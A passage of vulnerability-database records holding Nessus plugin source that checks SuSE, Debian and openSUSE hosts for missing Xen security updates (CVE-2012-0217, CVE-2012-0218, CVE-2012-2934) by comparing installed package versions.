value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-debug-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-kdump-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-kdumppae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmi-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmipae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:36:13", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xen-tools", "p-cpe:/a:novell:suse_linux:11:xen-tools-domU", "p-cpe:/a:novell:suse_linux:11:xen-kmp-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xen", "p-cpe:/a:novell:suse_linux:11:xen-doc-pdf", "p-cpe:/a:novell:suse_linux:11:xen-doc-html", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:xen-libs", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "id": "SUSE_11_XEN-201206-120606.NASL", "href": "https://www.tenable.com/plugins/nessus/64233", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64233);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6399.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:32", "description": "Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.", "edition": 18, "published": "2012-06-29T00:00:00", "title": "Debian DSA-2501-1 : xen - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:xen"], "id": "DEBIAN_DSA-2501.NASL", "href": "https://www.tenable.com/plugins/nessus/59779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2501. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59779);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53955, 53961);\n script_xref(name:\"DSA\", value:\"2501\");\n\n script_name(english:\"Debian DSA-2501-1 : xen - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libxen-dev\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxenstore3.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-docs-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-amd64\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-i386\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-utils-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xenstore-utils\", reference:\"4.0.1-5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:03", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-2012-404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default"], "id": "OPENSUSE-2012-404.NASL", "href": "https://www.tenable.com/plugins/nessus/74683", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-404.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74683);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0029\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-2012-404)\");\n script_summary(english:\"Check for the openSUSE-2012-404 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 